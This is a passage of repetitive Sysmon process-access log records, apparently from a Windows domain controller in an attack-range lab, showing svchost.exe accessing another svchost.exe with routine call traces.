05:47:13.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2653,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2654,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2655,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2656,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2657,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2658,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2659,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2660,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 